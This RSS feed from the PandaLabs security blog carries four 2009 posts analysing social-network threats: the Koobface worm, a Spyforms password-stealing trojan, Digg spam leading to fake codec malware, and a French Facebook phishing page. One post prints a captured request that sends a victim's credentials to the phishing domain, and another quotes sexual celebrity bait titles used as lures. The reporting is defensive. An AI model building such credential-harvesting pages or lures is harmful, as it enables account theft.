<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="http://pandalabs.pandasecurity.com/utility/FeedStylesheets/rss.xsl" media="screen"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:wfw="http://wellformedweb.org/CommentAPI/"><channel><title>PandaLabs : Social Networks</title><link>http://pandalabs.pandasecurity.com/archive/tags/Social+Networks/default.aspx</link><description>Tags: Social Networks</description><dc:language>en</dc:language><generator>CommunityServer 2.1 SP2 (Build: 61120.2)</generator><item><title>Koobface: The saga continues</title><link>http://pandalabs.pandasecurity.com/archive/Koobface_3A00_-The-saga-continues.aspx</link><pubDate>Thu, 13 Aug 2009 22:49:00 GMT</pubDate><guid isPermaLink="false">b262f9bf-63e5-46e5-8a14-4069a6997bc7:1028</guid><dc:creator>Sean-Paul Correll</dc:creator><slash:comments>0</slash:comments><comments>http://pandalabs.pandasecurity.com/comments/1028.aspx</comments><wfw:commentRss>http://pandalabs.pandasecurity.com/commentrss.aspx?PostID=1028</wfw:commentRss><description>&lt;p&gt;The gang behind the Koobface worm has been hard at work in releasing the next iteration of their worm. We&amp;#39;ve already identified over 60 active domains spreading the content through the usual method of posting a message linking to a &amp;quot;CooooL Video&amp;quot; on Facebook.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sample malspam:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.flickr.com/photos/lithium-/3818971294/sizes/o/"&gt;&lt;img alt="Koobface Link" border="0" height="104" src="http://farm3.static.flickr.com/2622/3818971294_a4afca27c1.jpg" width="500" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;After clicking the link, the victims are automatically redirected to a Koobface controlled server, which then routes the them off to a fake codec site specifically designed for the social network they came from.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Fake codec site:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The Koobface gang uses the same old &amp;quot;Flash Player upgrade required&amp;quot; tactic to trick users into opening the executable, which then ultimately transforms their machine into a distribution point for the infection to further propagate.&amp;nbsp; &lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.flickr.com/photos/lithium-/3818161637/sizes/o/"&gt;&lt;img alt="Koobface Site" border="0" height="278" src="http://farm3.static.flickr.com/2477/3818161637_7a3704c04d.jpg" width="500" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Koobface connection log:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="Koobface connection log" height="137" src="http://farm3.static.flickr.com/2555/3819053496_c6755deb84.jpg" width="449" /&gt;&lt;/p&gt;
&lt;p&gt;On infection, the Koobface worm immediately attempts to download three additional exectuable files.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Koobface on infection" height="51" src="http://farm4.static.flickr.com/3576/3818286901_2802cdac27_o.png" width="308" /&gt;&lt;/p&gt;
&lt;p&gt;After turning the victims computer into its next distribution point, it also attempts to monetize by installing &amp;quot;Total Security&amp;quot; Rogueware.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.flickr.com/photos/lithium-/3818323947/sizes/o/"&gt;&lt;img alt="Adware/TotalSecurity" border="0" height="374" src="http://farm3.static.flickr.com/2615/3818323947_c150765538.jpg" width="500" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://pandalabs.pandasecurity.com/aggbug.aspx?PostID=1028" width="1" height="1"&gt;</description><category domain="http://pandalabs.pandasecurity.com/archive/tags/Rogueware/default.aspx">Rogueware</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Social+Networks/default.aspx">Social Networks</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Worms/default.aspx">Worms</category></item><item><title>Malware Impersonates Classmates and Facebook Websites to Deliver Password Stealing Trojan</title><link>http://pandalabs.pandasecurity.com/archive/Malware-Impersonates-Classmates-and-Facebook-to-Deliver-Password-Stealing-Trojan.aspx</link><pubDate>Thu, 12 Mar 2009 08:38:00 GMT</pubDate><guid isPermaLink="false">b262f9bf-63e5-46e5-8a14-4069a6997bc7:981</guid><dc:creator>Sean-Paul Correll</dc:creator><slash:comments>0</slash:comments><comments>http://pandalabs.pandasecurity.com/comments/981.aspx</comments><wfw:commentRss>http://pandalabs.pandasecurity.com/commentrss.aspx?PostID=981</wfw:commentRss><description>&lt;p&gt;&lt;br /&gt;
  Websites  designed to look like Classmates.com and Facebook are currently being used to  distribute a password stealing Trojan, which we detect as &lt;a href="http://www.pandasecurity.com/homeusers/security-info/about-malware/encyclopedia/overview.aspx?lst=vis&amp;amp;idvirus=206993&amp;amp;sitepanda=particulares"&gt;Trj/Spyforms.BZ&lt;/a&gt;. &amp;nbsp;&amp;nbsp;Some of you may remember the Spyforms Malware  family from a &lt;a href="http://pandalabs.pandasecurity.com/archive/Barack-Obama_2700_s-Spam-_2600_-Malware-Campaign.aspx"&gt;previous  incident&lt;/a&gt; involving Barack Obama spam campaigns. In this most recent  incident, the malicious web links are still primarily distributed via spam  e-mails. Once clicked, the victim is presented with a realistic looking  Classmates or Facebook website.&amp;nbsp; The website  contains a fake YouTube video, which prompts a dialog stating &amp;ldquo;Please Download  correct Flash Movie Player!&amp;nbsp;  Installation: Double-click the downloaded installer.&amp;nbsp; Follow the on-screen instructions!&amp;rdquo; and  attempts to download a file named Adobemedia10.exe or Adobemedia11.exe.&amp;nbsp; &lt;br /&gt;
  &lt;br /&gt;
  &lt;img alt="Fake Classmates.com Malware Site" border="0" height="488" src="http://support.us.pandasecurity.com/Blog/classmates.jpg" width="624" /&gt; &lt;br /&gt;
  &lt;br /&gt;
  &lt;img alt="Fake Facebook Malware Site" border="0" height="486" src="http://support.us.pandasecurity.com/Blog/facebook.jpg" width="624" /&gt;&lt;br /&gt;
  &lt;br /&gt;
Once installed, the Trojan intercepts network  traffic in order to obtain ftp, icq, pop3, and imap passwords and then sends  the data back to a server in a Hong Kong based ISP (HOSTFRESH).&amp;nbsp; You may recall the last major Malware  incident involving the Hong Kong based ISP, which was one of the providers  involved in the malware distribution operation taking place inside of the &lt;a href="http://hostexploit.com/downloads/Atrivo%20white%20paper%20082808ac.pdf"&gt;Atrivo/Intercage&lt;/a&gt; network.
&lt;/p&gt;&lt;img src="http://pandalabs.pandasecurity.com/aggbug.aspx?PostID=981" width="1" height="1"&gt;</description><category domain="http://pandalabs.pandasecurity.com/archive/tags/Social+Networks/default.aspx">Social Networks</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Facebook.com/default.aspx">Facebook.com</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Hostfresh/default.aspx">Hostfresh</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Spyforms/default.aspx">Spyforms</category></item><item><title>Ever heard the term "Rickrolling"? Malware distributors have...</title><link>http://pandalabs.pandasecurity.com/archive/Have-you-ever-heard-the-term-_2200_Rickrolling_22003F00_-Malware-distributors-have_2E002E002E00_.aspx</link><pubDate>Mon, 09 Feb 2009 10:21:00 GMT</pubDate><guid isPermaLink="false">b262f9bf-63e5-46e5-8a14-4069a6997bc7:961</guid><dc:creator>Sean-Paul Correll</dc:creator><slash:comments>0</slash:comments><comments>http://pandalabs.pandasecurity.com/comments/961.aspx</comments><wfw:commentRss>http://pandalabs.pandasecurity.com/commentrss.aspx?PostID=961</wfw:commentRss><description>



&lt;p&gt;&lt;strong&gt;Rickrolling&lt;/strong&gt; is an Internet meme typically involving the music video for the 1987 Rick Astley song &amp;quot;Never Gonna Give You Up&amp;quot;. The meme is a bait and switch: a person provides a web link that he or she claims is relevant to the topic at hand, but the link actually takes the user to the Astley video.&lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;Over the past few months we have noticed attacker efforts to maximize blackhat SEO tactics and increase infection rates at the same time by abusing the popular social news aggregate site &lt;a href="http://www.digg.com" title="Digg"&gt;Digg.com&lt;/a&gt;. Digg allows users to create, vote, and comment on news stories.&lt;/p&gt;

&lt;p&gt;  Malware distributors have been creating false stories with catchy subject lines as an attempt to bait users into clicking links which lead to Malware. In some cases the attackers do not create the news story themselves, rather linking to others relevant content. Below is an example of the attacker (in red) taking advantage of a valid digg submission. The malicious comment reads, &amp;quot;Heath Ledger naked in the shower, playing with herself.&amp;quot; and is posted to a relevant story about Heath Ledger. The &amp;quot;playing with herself&amp;quot; part is a bit confusing but my guess is that the attackers are using automation scripts to auto-generate content based on topic relevancy or that they are manually doing this and have no idea who Heath Ledger is.&lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;img alt="Example on Digg" height="513" src="http://support.us.pandasecurity.com/blog/digg_example.png" width="679" /&gt;&lt;/p&gt;

&lt;p&gt;My initial search identified 52 accounts posting news stories or comments with malicious URI&amp;#39;s. The links all point to various fake codec sites, which lead to rogue anti-malware infections.  We detect and block the malware as &lt;strong&gt;Adware/VideoPlay&lt;/strong&gt;.&lt;br /&gt;&lt;/p&gt;&lt;strong&gt;Update:&lt;/strong&gt;  &lt;a href="http://ddanchev.blogspot.com/2009/02/fake-codec-serving-domains-from.html"&gt;Dancho Danchev&lt;/a&gt; reported that there has been over 500,000 malicious comments posted via Digg since last year.  

&lt;p&gt;&lt;strong&gt;Some of the titles include&lt;/strong&gt;: &lt;/p&gt;

&lt;blockquote&gt;
&lt;p class="style1"&gt;&lt;sub&gt;Christian Bale freak out dubbed with video!&lt;br /&gt;
  Christian Bale Terminator Salvation Takes it Up the Ass&lt;br /&gt;
  Hot and sexy model Mayuko Lwasa in bikini &lt;br /&gt;
  Pregnant Ujwala Raut in Bikini&lt;br /&gt;
  megan fox naked secret videos&lt;br /&gt;
  Sexy Megan Fox having sex Sex Tape, rally nice and hot video&lt;br /&gt;
  Megan Fox naked NEW SEX TAPE &lt;br /&gt;
  Robert Pattinson: fotos, v&amp;iacute;deos, hist&amp;oacute;ria&lt;br /&gt;
  Jessica Simpson Hotel Sex Tape&lt;br /&gt;
  Batman is Naked aka Christian Bale &lt;br /&gt;
  Watch Grey&amp;#39;s Anatomy Season 5 online here&lt;br /&gt;
  Breaks Season 4 Episode 9&lt;br /&gt;
  Emma Watson Nude Video&lt;br /&gt;
  Watch Emma Watson Sex Tape online here&lt;br /&gt;
  Paris Hilton Sex Tape Update&lt;br /&gt;
  VANESSA ANNE HUDGENS NUDE, NAKED GALLERY, EXCLUSIVE 2009&lt;br /&gt;
  Naked Truth on Celebrity News and Edison Chen Sex Scandal&lt;br /&gt;
  Paris Hilton sex tape! Paris Hilton nude, naked movie!&lt;br /&gt;
  Celebrity and Angelina Jolie nude, naked, in bikini, gallery&lt;br /&gt;
  Tila Tequila topless nude and naked sex-porn gallery&lt;br /&gt;
  Alyssa Milano nude, naked, sex tape - free gallery!&lt;br /&gt;
  BRITNEY SPEARS NUDE, BRITNEY SPEARS NAKED &amp;amp; SEX TAPE (CLICK HERE)&lt;br /&gt;
  Lindsay Lohan&amp;#39;s nude Marilyn shoot&lt;br /&gt;
  Heath Ledger naked in shower, playing with herself!!&lt;/sub&gt;&lt;/p&gt;
&lt;sub&gt;&lt;/sub&gt;
&lt;/blockquote&gt;

&lt;p class="style1"&gt;&lt;strong&gt;Fake Codec Sites:&amp;nbsp;&lt;/strong&gt; &lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;img alt="Types of Fake Media Codec Pages" height="291" src="http://support.us.pandasecurity.com/blog/media_codecs.png" width="679" /&gt;&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;New Version of MS Antispyware 2009&lt;/strong&gt; &lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;img alt="Rogue Infections" height="427" src="http://support.us.pandasecurity.com/blog/rogue_infections.png" width="679" /&gt;&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;img src="http://pandalabs.pandasecurity.com/aggbug.aspx?PostID=961" width="1" height="1"&gt;</description><category domain="http://pandalabs.pandasecurity.com/archive/tags/Social+Networks/default.aspx">Social Networks</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Malicious+links/default.aspx">Malicious links</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Rickroll/default.aspx">Rickroll</category></item><item><title>Facebook Phishing Site Targets French Users</title><link>http://pandalabs.pandasecurity.com/archive/Facebook-Phishing-Site-Targets-French-Users.aspx</link><pubDate>Thu, 05 Feb 2009 11:18:00 GMT</pubDate><guid isPermaLink="false">b262f9bf-63e5-46e5-8a14-4069a6997bc7:960</guid><dc:creator>Sean-Paul Correll</dc:creator><slash:comments>0</slash:comments><comments>http://pandalabs.pandasecurity.com/comments/960.aspx</comments><wfw:commentRss>http://pandalabs.pandasecurity.com/commentrss.aspx?PostID=960</wfw:commentRss><description>&lt;p&gt;Today I discovered a new Facebook phishing site targeting French users.&amp;nbsp; The login page looks identical to the official &lt;a href="http://www.facebook.com/" title="Facebook Login"&gt;Facebook&lt;/a&gt; site, but the phishing site passes the victims credentials through a submission form before redirecting them to the official Facebook login site. &lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;a href="http://support.us.pandasecurity.com/blog/fakebook.png"&gt;&lt;img alt="Fake Facebook Login Page" border="0" height="490" src="http://support.us.pandasecurity.com/blog/fakebook.png" title="Fake Facebook Login Page" width="679" /&gt;&lt;/a&gt;&lt;/p&gt;
 
&lt;p&gt;&lt;strong&gt;Source: &lt;/strong&gt;&lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;img alt="source code to phishing page" border="0" height="204" src="http://support.us.pandasecurity.com/blog/source.png" title="source code to phishing page" width="669" /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Connection:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;(Passing the victims credentials over to the attacker)&lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;sub&gt;&lt;strong&gt;GET&lt;/strong&gt; hxxp://www.facebook-online.com/next.php?charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&amp;amp;locale=fr_FR&amp;amp;email=&lt;strong&gt;victim@domain.com&lt;/strong&gt;&amp;amp;pass=&lt;strong&gt;victimpass&lt;/strong&gt;&amp;amp;pass_placeholder=Mot+de+passe&amp;amp;charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&lt;/sub&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;(Redirecting to the official Facebook login page)&lt;/p&gt;
&lt;p&gt;&lt;sub&gt;&lt;strong&gt;302&lt;/strong&gt; Moved Temporarily to https://login.facebook.com/login.php &lt;strong&gt;&lt;/strong&gt;&lt;/sub&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;Even though this is a run of the mill phishing attack, we have noticed an uptrend of Phishing attacks especially in social networks.&amp;nbsp; The attackers can do many things with harvested accounts, but one of the most common is to harvest as many accounts as possible before unleashing mass spamvertising or even full blown malware campaigns.&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;strong&gt;Tips to Avoid Phishing Attacks on Facebook [&lt;a href="http://blog.facebook.com/blog.php?post=14600297130" title="Tips to Avoid Phishing"&gt;Facebook Blog&lt;/a&gt;]&lt;br /&gt;
&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Remember, Facebook will never ask for your password&lt;/strong&gt; in
an email, Facebook message, or any medium that isn&amp;#39;t the login page.
Though you will need to re-enter your password when you set a security
question, change your contact email, or send a virtual gift.&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Be extra aware of weird Wall posts.&lt;/strong&gt;  Don&amp;#39;t click on any links&amp;mdash;on a Wall or elsewhere&amp;mdash;if you don&amp;#39;t know where they go.&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Set a security question&lt;/strong&gt; for yourself on your &lt;a href="https://register.facebook.com/editaccount.php" title="https://register.facebook.com/editaccount.php" target="_blank"&gt;Account&lt;/a&gt;
page. If somehow something malicious shuts you out of your account, you
will need the answer to that question in order for our User Operations
team to let you back in. (If you&amp;#39;ve already set your security question,
you won&amp;#39;t see a prompt for it on your Account page.)&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Be extra aware of what website you are using to log in to Facebook&lt;/strong&gt;&lt;span&gt;
(and other websites). Phishing websites can be made to look like other
websites (like the Facebook log in page), and might try to disguise
their urls. Be smart: www.facebook.com.profile.a&lt;/span&gt;&lt;span class="word_break"&gt;&lt;/span&gt;36h8su2m8.info/login
starts out looking like a legitimate Facebook website, but that
a36h8su2m8.info part means it&amp;#39;s fraudulent. Set and use a browser
bookmark to make sure you always log in from facebook.com&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;If you see a Wall post that looks like spam&lt;/strong&gt; on a friend&amp;#39;s Wall, tell the author to delete it and reset their password immediately.&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Use a modern web browser&lt;/strong&gt; to benefit from anti-phishing protection
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://blogs.msdn.com/ie/archive/2005/09/09/463204.aspx" title="http://blogs.msdn.com/ie/archive/2005/09/09/463204.aspx        " target="_blank"&gt;Internet Explorer 7&lt;/a&gt;&lt;/li&gt;

&lt;li&gt;&lt;a href="http://www.mozilla.com/en-US/firefox/phishing-protection/" title="http://www.mozilla.com/en-US/firefox/phishing-protection/" target="_blank"&gt;Firefox&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Check out &lt;a href="http://www.opendns.com/" title="http://www.opendns.com" target="_blank"&gt;opendns.com&lt;/a&gt;&lt;/strong&gt;. This is another method for blocking specific domains that host phishing sites.&lt;/li&gt;
&lt;/ul&gt;
Make sure that you have an up-to-date Anti-Malware solution running at all times to prevent Phishing and other types of malicious attacks.&amp;nbsp;&amp;nbsp; &lt;br /&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;br /&gt;
&amp;nbsp;&lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;img src="http://pandalabs.pandasecurity.com/aggbug.aspx?PostID=960" width="1" height="1"&gt;</description><category domain="http://pandalabs.pandasecurity.com/archive/tags/Phishing/default.aspx">Phishing</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Anti-Phishing/default.aspx">Anti-Phishing</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Social+Networks/default.aspx">Social Networks</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Tips/default.aspx">Tips</category></item></channel></rss>